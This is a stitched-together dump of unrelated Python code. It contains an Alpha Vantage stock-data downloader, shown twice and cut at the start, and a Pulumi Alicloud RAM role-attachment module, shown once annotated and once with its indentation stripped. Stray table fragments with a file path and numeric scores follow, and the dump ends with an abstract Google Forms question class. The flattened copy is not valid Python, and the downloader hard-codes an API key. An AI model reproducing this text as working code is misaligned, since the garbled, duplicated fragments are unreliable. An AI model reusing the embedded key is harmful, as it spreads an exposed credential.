    to data/<symbol>.csv.  Returns None; unknown symbols are skipped.
    """
    try:
        # NOTE(review): hard-coded API key — move to configuration.
        ts = TimeSeries(key='055UMQXJRDY71RG3', output_format='pandas')
        data, meta_data = ts.get_intraday(
            symbol=symbol, interval=interval, outputsize='full')
        pd.set_option('display.max_rows', 5000)
        dataCovert = str(pd.DataFrame(data))
        # Context managers guarantee the files are closed even on error.
        with open('data/output.txt', "w") as f:
            f.write(dataCovert)
        with open('data/output.txt') as f1:
            lines = f1.readlines()
        # Skip the two header lines of the DataFrame repr; ignore blanks.
        rows = [ln.split() for ln in lines[2:] if ln.strip()]
        DataTemp = ["timestamp,open,high,low,close,volume,vwap\n"]
        cumulative_total = 0.0
        cumulative_volume = 0.0
        for fields in rows:
            # First two tokens form the timestamp: '2017-10-30 09:30:00'.
            date = fields.pop(0)
            date += ' ' + fields.pop(0)
            # Remaining tokens: open, high, low, close, volume.
            typical_price = (float(fields[0]) +
                             float(fields[1]) + float(fields[2])) / 3
            # BUGFIX: VWAP must be weighted by volume (fields[4]); the
            # original used fields[3], which is the close price.
            volume = float(fields[4])
            cumulative_total += (typical_price * volume)
            cumulative_volume += volume
            # Guard against zero cumulative volume (would divide by zero).
            vwap = cumulative_total / cumulative_volume if cumulative_volume else 0.0
            DataTemp.append(",".join([date] + fields + [str(vwap)]) + "\n")
        write_csv(file_name="data/" + symbol + ".csv", data=DataTemp)
    except ValueError:
        # Alpha Vantage raises ValueError for unknown symbols; skip them.
        pass
# get list of symbols automatically
def get_symbols(directory_name):
    """Download the company list of every exchange in STOCK_EXCHANGES
    into *directory_name* as <exchange>.csv (first 8 columns, ';'-joined)."""
    for exchange in STOCK_EXCHANGES:
        with requests.Session() as session:
            response = session.get(SYMBOL_URL.format(exchange))
            content = response.content.decode('utf-8')
        reader = csv.reader(content.splitlines(), delimiter=',')
        lines = [';'.join(row[:8]) + '\n' for row in reader]
        write_csv(os.path.join(directory_name, exchange + ".csv"), lines)
# Get data for all stocks below some price
def get_data():
    """Refresh the symbol lists, then download intraday history for every
    symbol found under data/symbols/."""
    get_symbols("data/symbols/")
    columns = ["Symbol", "Name", "LastSale", "MarketCap", "IPOyear",
               "Sector", "industry", "Summary Quote"]
    for filename in glob.glob(os.path.join("data/symbols/", '*.csv')):
        for chunk in read_csv(file_name=filename, names=columns, sep=";"):
            for symbol in chunk["Symbol"].values.tolist():
                print("Downloading data for ", symbol)
                downloadHistory_stocks(symbol)
    return
def read_csv(file_name, names=["timestamp", "open", "high", "low", "close", "volume", "vwap"], sep=',', chunksize=29):
    """Open *file_name* with pandas and return an iterator of DataFrame
    chunks; the file's first line is treated as a header and replaced by
    *names*."""
    return pd.read_csv(file_name, names=names, sep=sep,
                       header=0, chunksize=chunksize)
def write_csv(file_name="result.csv", data=[]):
    """Write the already-formatted lines in *data* to *file_name*.

    NOTE: *data* defaults to a mutable list; it is never mutated here,
    so the shared default is harmless, and the signature is kept for
    backward compatibility.
    """
    # Context manager guarantees the file is closed even if writing fails
    # (the original leaked the handle on exception).
    with open(file_name, "w") as out:
        out.writelines(data)
if __name__ == '__main__':
    # Smoke test: fetch one symbol.  NOTE(review): downloadHistory_stocks
    # returns None, so the assignment below is only vestigial (and the
    # variable name no longer matches the 'SLV' symbol).
    apple_data = downloadHistory_stocks('SLV')
    #mbi_data = downloadHistory_stocks('MBI')
    #google_data = downloadHistory_stocks('GOOGL')
from datetime import datetime
import csv
import pandas as pd
import requests
import os
import glob
# Nasdaq company-list download endpoint; {} is filled with the exchange name.
SYMBOL_URL = "http://www.nasdaq.com/screening/companies-by-name.aspx?letter=0&exchange={}&render=download"
# Exchanges whose symbol lists are fetched by get_symbols().
STOCK_EXCHANGES = ["nasdaq", "nyse"]
# Get last 7 days worth of data
def downloadHistory_stocks(symbol, interval='1min'):
    """Fetch full intraday history for *symbol* from Alpha Vantage.

    Side effects: writes the raw DataFrame dump to data/output.txt (kept
    for backward compatibility) and a CSV with a cumulative-VWAP column
    to data/<symbol>.csv.  Returns None; unknown symbols are skipped.
    """
    try:
        # NOTE(review): hard-coded API key — move to configuration.
        ts = TimeSeries(key='055UMQXJRDY71RG3', output_format='pandas')
        data, meta_data = ts.get_intraday(
            symbol=symbol, interval=interval, outputsize='full')
        pd.set_option('display.max_rows', 5000)
        dataCovert = str(pd.DataFrame(data))
        # Context managers guarantee the files are closed even on error.
        with open('data/output.txt', "w") as f:
            f.write(dataCovert)
        with open('data/output.txt') as f1:
            lines = f1.readlines()
        # Skip the two header lines of the DataFrame repr; ignore blanks.
        rows = [ln.split() for ln in lines[2:] if ln.strip()]
        DataTemp = ["timestamp,open,high,low,close,volume,vwap\n"]
        cumulative_total = 0.0
        cumulative_volume = 0.0
        for fields in rows:
            # First two tokens form the timestamp: '2017-10-30 09:30:00'.
            date = fields.pop(0)
            date += ' ' + fields.pop(0)
            # Remaining tokens: open, high, low, close, volume.
            typical_price = (float(fields[0]) +
                             float(fields[1]) + float(fields[2])) / 3
            # BUGFIX: VWAP must be weighted by volume (fields[4]); the
            # original used fields[3], which is the close price.
            volume = float(fields[4])
            cumulative_total += (typical_price * volume)
            cumulative_volume += volume
            # Guard against zero cumulative volume (would divide by zero).
            vwap = cumulative_total / cumulative_volume if cumulative_volume else 0.0
            DataTemp.append(",".join([date] + fields + [str(vwap)]) + "\n")
        write_csv(file_name="data/" + symbol + ".csv", data=DataTemp)
    except ValueError:
        # Alpha Vantage raises ValueError for unknown symbols; skip them.
        pass
# get list of symbols automatically
def get_symbols(directory_name):
    """Download the company list of every exchange in STOCK_EXCHANGES
    into *directory_name* as <exchange>.csv (first 8 columns, ';'-joined)."""
    for exchange in STOCK_EXCHANGES:
        with requests.Session() as session:
            response = session.get(SYMBOL_URL.format(exchange))
            content = response.content.decode('utf-8')
        reader = csv.reader(content.splitlines(), delimiter=',')
        lines = [';'.join(row[:8]) + '\n' for row in reader]
        write_csv(os.path.join(directory_name, exchange + ".csv"), lines)
# Get data for all stocks below some price
def get_data():
    """Refresh the symbol lists, then download intraday history for every
    symbol found under data/symbols/."""
    get_symbols("data/symbols/")
    columns = ["Symbol", "Name", "LastSale", "MarketCap", "IPOyear",
               "Sector", "industry", "Summary Quote"]
    for filename in glob.glob(os.path.join("data/symbols/", '*.csv')):
        for chunk in read_csv(file_name=filename, names=columns, sep=";"):
            for symbol in chunk["Symbol"].values.tolist():
                print("Downloading data for ", symbol)
                downloadHistory_stocks(symbol)
    return
def read_csv(file_name, names=["timestamp", "open", "high", "low", "close", "volume", "vwap"], sep=',', chunksize=29):
    """Open *file_name* with pandas and return an iterator of DataFrame
    chunks; the file's first line is treated as a header and replaced by
    *names*."""
    return pd.read_csv(file_name, names=names, sep=sep,
                       header=0, chunksize=chunksize)
def write_csv(file_name="result.csv", data=[]):
    """Write the already-formatted lines in *data* to *file_name*.

    NOTE: *data* defaults to a mutable list; it is never mutated here,
    so the shared default is harmless, and the signature is kept for
    backward compatibility.
    """
    # Context manager guarantees the file is closed even if writing fails
    # (the original leaked the handle on exception).
    with open(file_name, "w") as out:
        out.writelines(data)
if __name__ == '__main__':
    # Smoke test: fetch one symbol.  NOTE(review): downloadHistory_stocks
    # returns None, so the assignment below is only vestigial (and the
    # variable name no longer matches the 'SLV' symbol).
    apple_data = downloadHistory_stocks('SLV')
    #mbi_data = downloadHistory_stocks('MBI')
    #google_data = downloadHistory_stocks('GOOGL')
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['RoleAttachmentArgs', 'RoleAttachment']
@pulumi.input_type
class RoleAttachmentArgs:
    # Auto-generated Pulumi input type: values live in pulumi's internal
    # property store and are accessed via pulumi.get / pulumi.set.
    def __init__(__self__, *,
                 instance_ids: pulumi.Input[Sequence[pulumi.Input[str]]],
                 role_name: pulumi.Input[str]):
        """
        The set of arguments for constructing a RoleAttachment resource.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: The list of ECS instance's IDs.
        :param pulumi.Input[str] role_name: The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
        """
        pulumi.set(__self__, "instance_ids", instance_ids)
        pulumi.set(__self__, "role_name", role_name)

    @property
    @pulumi.getter(name="instanceIds")
    def instance_ids(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """
        The list of ECS instance's IDs.
        """
        return pulumi.get(self, "instance_ids")

    @instance_ids.setter
    def instance_ids(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "instance_ids", value)

    @property
    @pulumi.getter(name="roleName")
    def role_name(self) -> pulumi.Input[str]:
        """
        The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
        """
        return pulumi.get(self, "role_name")

    @role_name.setter
    def role_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "role_name", value)
@pulumi.input_type
class _RoleAttachmentState:
    # Auto-generated Pulumi state type: unlike RoleAttachmentArgs, every
    # field is optional because state lookups may be partial.
    def __init__(__self__, *,
                 instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 role_name: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering RoleAttachment resources.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: The list of ECS instance's IDs.
        :param pulumi.Input[str] role_name: The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
        """
        if instance_ids is not None:
            pulumi.set(__self__, "instance_ids", instance_ids)
        if role_name is not None:
            pulumi.set(__self__, "role_name", role_name)

    @property
    @pulumi.getter(name="instanceIds")
    def instance_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        The list of ECS instance's IDs.
        """
        return pulumi.get(self, "instance_ids")

    @instance_ids.setter
    def instance_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "instance_ids", value)

    @property
    @pulumi.getter(name="roleName")
    def role_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
        """
        return pulumi.get(self, "role_name")

    @role_name.setter
    def role_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "role_name", value)
class RoleAttachment(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 role_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Provides a RAM role attachment resource to bind role for several ECS instances.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_alicloud as alicloud

        default_zones = alicloud.get_zones(available_disk_category="cloud_efficiency",
            available_resource_creation="VSwitch")
        default_instance_types = alicloud.ecs.get_instance_types(availability_zone=default_zones.zones[0].id,
            cpu_core_count=2,
            memory_size=4)
        default_images = alicloud.ecs.get_images(name_regex="^ubuntu_18.*64",
            most_recent=True,
            owners="system")
        config = pulumi.Config()
        name = config.get("name")
        if name is None:
            name = "ecsInstanceVPCExample"
        default_network = alicloud.vpc.Network("defaultNetwork",
            vpc_name=name,
            cidr_block="172.16.0.0/16")
        default_switch = alicloud.vpc.Switch("defaultSwitch",
            vpc_id=default_network.id,
            cidr_block="172.16.0.0/24",
            zone_id=default_zones.zones[0].id)
        default_security_group = alicloud.ecs.SecurityGroup("defaultSecurityGroup", vpc_id=default_network.id)
        default_security_group_rule = alicloud.ecs.SecurityGroupRule("defaultSecurityGroupRule",
            type="ingress",
            ip_protocol="tcp",
            nic_type="intranet",
            policy="accept",
            port_range="22/22",
            priority=1,
            security_group_id=default_security_group.id,
            cidr_ip="172.16.0.0/24")
        foo = alicloud.ecs.Instance("foo",
            vswitch_id=default_switch.id,
            image_id=default_images.images[0].id,
            instance_type=default_instance_types.instance_types[0].id,
            system_disk_category="cloud_efficiency",
            internet_charge_type="PayByTraffic",
            internet_max_bandwidth_out=5,
            security_groups=[default_security_group.id],
            instance_name=name)
        role = alicloud.ram.Role("role",
            document=\"\"\"    {
              "Statement": [
                {
                  "Action": "sts:AssumeRole",
                  "Effect": "Allow",
                  "Principal": {
                    "Service": [
                      "ecs.aliyuncs.com"
                    ]
                  }
                }
              ],
              "Version": "1"
            }
        \"\"\",
            description="this is a test",
            force=True)
        attach = alicloud.ram.RoleAttachment("attach",
            role_name=role.name,
            instance_ids=[__item.id for __item in [foo]])
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: The list of ECS instance's IDs.
        :param pulumi.Input[str] role_name: The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
        """
        # Overload signature only; the real work happens in _internal_init.
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: RoleAttachmentArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a RAM role attachment resource to bind role for several ECS instances.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_alicloud as alicloud

        default_zones = alicloud.get_zones(available_disk_category="cloud_efficiency",
            available_resource_creation="VSwitch")
        default_instance_types = alicloud.ecs.get_instance_types(availability_zone=default_zones.zones[0].id,
            cpu_core_count=2,
            memory_size=4)
        default_images = alicloud.ecs.get_images(name_regex="^ubuntu_18.*64",
            most_recent=True,
            owners="system")
        config = pulumi.Config()
        name = config.get("name")
        if name is None:
            name = "ecsInstanceVPCExample"
        default_network = alicloud.vpc.Network("defaultNetwork",
            vpc_name=name,
            cidr_block="172.16.0.0/16")
        default_switch = alicloud.vpc.Switch("defaultSwitch",
            vpc_id=default_network.id,
            cidr_block="172.16.0.0/24",
            zone_id=default_zones.zones[0].id)
        default_security_group = alicloud.ecs.SecurityGroup("defaultSecurityGroup", vpc_id=default_network.id)
        default_security_group_rule = alicloud.ecs.SecurityGroupRule("defaultSecurityGroupRule",
            type="ingress",
            ip_protocol="tcp",
            nic_type="intranet",
            policy="accept",
            port_range="22/22",
            priority=1,
            security_group_id=default_security_group.id,
            cidr_ip="172.16.0.0/24")
        foo = alicloud.ecs.Instance("foo",
            vswitch_id=default_switch.id,
            image_id=default_images.images[0].id,
            instance_type=default_instance_types.instance_types[0].id,
            system_disk_category="cloud_efficiency",
            internet_charge_type="PayByTraffic",
            internet_max_bandwidth_out=5,
            security_groups=[default_security_group.id],
            instance_name=name)
        role = alicloud.ram.Role("role",
            document=\"\"\"    {
              "Statement": [
                {
                  "Action": "sts:AssumeRole",
                  "Effect": "Allow",
                  "Principal": {
                    "Service": [
                      "ecs.aliyuncs.com"
                    ]
                  }
                }
              ],
              "Version": "1"
            }
        \"\"\",
            description="this is a test",
            force=True)
        attach = alicloud.ram.RoleAttachment("attach",
            role_name=role.name,
            instance_ids=[__item.id for __item in [foo]])
        ```

        :param str resource_name: The name of the resource.
        :param RoleAttachmentArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        # Overload signature only; the real work happens in _internal_init.
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads above: either a single
        # RoleAttachmentArgs bag or individual keyword properties.
        resource_args, opts = _utilities.get_resource_args_opts(RoleAttachmentArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 role_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        # Shared implementation behind both __init__ overloads: validates
        # options, fills in required properties and registers the resource.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource (not looking one up): __props__ must
            # not be supplied, and all required inputs must be present
            # unless an URN is being resolved.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = RoleAttachmentArgs.__new__(RoleAttachmentArgs)

            if instance_ids is None and not opts.urn:
                raise TypeError("Missing required property 'instance_ids'")
            __props__.__dict__["instance_ids"] = instance_ids
            if role_name is None and not opts.urn:
                raise TypeError("Missing required property 'role_name'")
            __props__.__dict__["role_name"] = role_name
        super(RoleAttachment, __self__).__init__(
            'alicloud:ram/roleAttachment:RoleAttachment',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            role_name: Optional[pulumi.Input[str]] = None) -> 'RoleAttachment':
        """
        Get an existing RoleAttachment resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: The list of ECS instance's IDs.
        :param pulumi.Input[str] role_name: The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
        """
        # Setting opts.id switches the constructor into lookup mode.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _RoleAttachmentState.__new__(_RoleAttachmentState)

        __props__.__dict__["instance_ids"] = instance_ids
        __props__.__dict__["role_name"] = role_name
        return RoleAttachment(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="instanceIds")
def instance_ids(self) -> pulumi.Output[Sequence[str]]:
"""
The list of ECS instance's IDs.
"""
return pulumi.get(self, "instance_ids")
@property
@pulumi.getter(name="roleName")
def role_name(self) -> pulumi.Output[str]:
"""
The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
return pulumi.get(self, "role_name") | sdk/python/pulumi_alicloud/ram/role_attachment.py |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['RoleAttachmentArgs', 'RoleAttachment']
@pulumi.input_type
class RoleAttachmentArgs:
def __init__(__self__, *,
instance_ids: pulumi.Input[Sequence[pulumi.Input[str]]],
role_name: pulumi.Input[str]):
"""
The set of arguments for constructing a RoleAttachment resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: The list of ECS instance's IDs.
:param pulumi.Input[str] role_name: The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
pulumi.set(__self__, "instance_ids", instance_ids)
pulumi.set(__self__, "role_name", role_name)
@property
@pulumi.getter(name="instanceIds")
def instance_ids(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
The list of ECS instance's IDs.
"""
return pulumi.get(self, "instance_ids")
@instance_ids.setter
def instance_ids(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "instance_ids", value)
@property
@pulumi.getter(name="roleName")
def role_name(self) -> pulumi.Input[str]:
"""
The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
return pulumi.get(self, "role_name")
@role_name.setter
def role_name(self, value: pulumi.Input[str]):
pulumi.set(self, "role_name", value)
@pulumi.input_type
class _RoleAttachmentState:
def __init__(__self__, *,
instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role_name: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering RoleAttachment resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: The list of ECS instance's IDs.
:param pulumi.Input[str] role_name: The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
if instance_ids is not None:
pulumi.set(__self__, "instance_ids", instance_ids)
if role_name is not None:
pulumi.set(__self__, "role_name", role_name)
@property
@pulumi.getter(name="instanceIds")
def instance_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The list of ECS instance's IDs.
"""
return pulumi.get(self, "instance_ids")
@instance_ids.setter
def instance_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "instance_ids", value)
@property
@pulumi.getter(name="roleName")
def role_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
return pulumi.get(self, "role_name")
@role_name.setter
def role_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role_name", value)
class RoleAttachment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a RAM role attachment resource to bind role for several ECS instances.
## Example Usage
```python
import pulumi
import pulumi_alicloud as alicloud
default_zones = alicloud.get_zones(available_disk_category="cloud_efficiency",
available_resource_creation="VSwitch")
default_instance_types = alicloud.ecs.get_instance_types(availability_zone=default_zones.zones[0].id,
cpu_core_count=2,
memory_size=4)
default_images = alicloud.ecs.get_images(name_regex="^ubuntu_18.*64",
most_recent=True,
owners="system")
config = pulumi.Config()
name = config.get("name")
if name is None:
name = "ecsInstanceVPCExample"
default_network = alicloud.vpc.Network("defaultNetwork",
vpc_name=name,
cidr_block="172.16.0.0/16")
default_switch = alicloud.vpc.Switch("defaultSwitch",
vpc_id=default_network.id,
cidr_block="172.16.0.0/24",
zone_id=default_zones.zones[0].id)
default_security_group = alicloud.ecs.SecurityGroup("defaultSecurityGroup", vpc_id=default_network.id)
default_security_group_rule = alicloud.ecs.SecurityGroupRule("defaultSecurityGroupRule",
type="ingress",
ip_protocol="tcp",
nic_type="intranet",
policy="accept",
port_range="22/22",
priority=1,
security_group_id=default_security_group.id,
cidr_ip="172.16.0.0/24")
foo = alicloud.ecs.Instance("foo",
vswitch_id=default_switch.id,
image_id=default_images.images[0].id,
instance_type=default_instance_types.instance_types[0].id,
system_disk_category="cloud_efficiency",
internet_charge_type="PayByTraffic",
internet_max_bandwidth_out=5,
security_groups=[default_security_group.id],
instance_name=name)
role = alicloud.ram.Role("role",
document=\"\"\" {
"Statement": [
{
"Action": "sts:AssumeRole",
"Effect": "Allow",
"Principal": {
"Service": [
"ecs.aliyuncs.com"
]
}
}
],
"Version": "1"
}
\"\"\",
description="this is a test",
force=True)
attach = alicloud.ram.RoleAttachment("attach",
role_name=role.name,
instance_ids=[__item.id for __item in [foo]])
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: The list of ECS instance's IDs.
:param pulumi.Input[str] role_name: The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: RoleAttachmentArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a RAM role attachment resource to bind role for several ECS instances.
## Example Usage
```python
import pulumi
import pulumi_alicloud as alicloud
default_zones = alicloud.get_zones(available_disk_category="cloud_efficiency",
available_resource_creation="VSwitch")
default_instance_types = alicloud.ecs.get_instance_types(availability_zone=default_zones.zones[0].id,
cpu_core_count=2,
memory_size=4)
default_images = alicloud.ecs.get_images(name_regex="^ubuntu_18.*64",
most_recent=True,
owners="system")
config = pulumi.Config()
name = config.get("name")
if name is None:
name = "ecsInstanceVPCExample"
default_network = alicloud.vpc.Network("defaultNetwork",
vpc_name=name,
cidr_block="172.16.0.0/16")
default_switch = alicloud.vpc.Switch("defaultSwitch",
vpc_id=default_network.id,
cidr_block="172.16.0.0/24",
zone_id=default_zones.zones[0].id)
default_security_group = alicloud.ecs.SecurityGroup("defaultSecurityGroup", vpc_id=default_network.id)
default_security_group_rule = alicloud.ecs.SecurityGroupRule("defaultSecurityGroupRule",
type="ingress",
ip_protocol="tcp",
nic_type="intranet",
policy="accept",
port_range="22/22",
priority=1,
security_group_id=default_security_group.id,
cidr_ip="172.16.0.0/24")
foo = alicloud.ecs.Instance("foo",
vswitch_id=default_switch.id,
image_id=default_images.images[0].id,
instance_type=default_instance_types.instance_types[0].id,
system_disk_category="cloud_efficiency",
internet_charge_type="PayByTraffic",
internet_max_bandwidth_out=5,
security_groups=[default_security_group.id],
instance_name=name)
role = alicloud.ram.Role("role",
document=\"\"\" {
"Statement": [
{
"Action": "sts:AssumeRole",
"Effect": "Allow",
"Principal": {
"Service": [
"ecs.aliyuncs.com"
]
}
}
],
"Version": "1"
}
\"\"\",
description="this is a test",
force=True)
attach = alicloud.ram.RoleAttachment("attach",
role_name=role.name,
instance_ids=[__item.id for __item in [foo]])
```
:param str resource_name: The name of the resource.
:param RoleAttachmentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RoleAttachmentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RoleAttachmentArgs.__new__(RoleAttachmentArgs)
if instance_ids is None and not opts.urn:
raise TypeError("Missing required property 'instance_ids'")
__props__.__dict__["instance_ids"] = instance_ids
if role_name is None and not opts.urn:
raise TypeError("Missing required property 'role_name'")
__props__.__dict__["role_name"] = role_name
super(RoleAttachment, __self__).__init__(
'alicloud:ram/roleAttachment:RoleAttachment',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
instance_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role_name: Optional[pulumi.Input[str]] = None) -> 'RoleAttachment':
"""
Get an existing RoleAttachment resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] instance_ids: The list of ECS instance's IDs.
:param pulumi.Input[str] role_name: The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RoleAttachmentState.__new__(_RoleAttachmentState)
__props__.__dict__["instance_ids"] = instance_ids
__props__.__dict__["role_name"] = role_name
return RoleAttachment(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="instanceIds")
def instance_ids(self) -> pulumi.Output[Sequence[str]]:
"""
The list of ECS instance's IDs.
"""
return pulumi.get(self, "instance_ids")
@property
@pulumi.getter(name="roleName")
def role_name(self) -> pulumi.Output[str]:
"""
The name of role used to bind. This name can have a string of 1 to 64 characters, must contain only alphanumeric characters or hyphens, such as "-", "_", and must not begin with a hyphen.
"""
return pulumi.get(self, "role_name") | 0.812533 | 0.136464 |
from abc import ABC, abstractmethod
from selenium.webdriver.remote.webelement import WebElement
from typing import Any, Optional, Tuple
class AbstractQuestion(ABC):
"""AbstractQuestion class as ABC for custom Google Form question classes."""
# region Getter methods
@abstractmethod
def _get_question_element(self) -> Optional[WebElement]:
"""Gets the web element which represents the entire question."""
pass
@abstractmethod
def get_header(self) -> Optional[str]:
"""Gets the question header."""
pass
@abstractmethod
def get_description(self) -> Optional[str]:
"""Gets the question description."""
pass
@abstractmethod
def is_required(self) -> Optional[bool]:
"""Checks if the question is required."""
pass
@abstractmethod
def get_answer_elements(self) -> Any:
"""Gets the web elements related to answering of the question."""
pass
# endregion Getter methods
# region Setter methods
@abstractmethod
def _set_header(self, header: str) -> None:
"""Sets the question header."""
pass
@abstractmethod
def set_question_element(self, element: WebElement) -> None:
"""Sets the web element representing the entire question if it has changed."""
pass
@abstractmethod
def set_answer_elements(self, *args, **kwargs) -> None:
"""Sets the web elements required for answering the question if it has changed."""
pass
@abstractmethod
def set_description(self, description: str) -> None:
"""Sets the question description if it has changed."""
pass
@abstractmethod
def set_required(self, required: bool) -> None:
"""Toggles the required flag if it has changed."""
pass
# endregion Setter methods
@abstractmethod
def _is_valid(self, *elements: WebElement) -> bool:
"""Check if the web element(s) is/are still valid."""
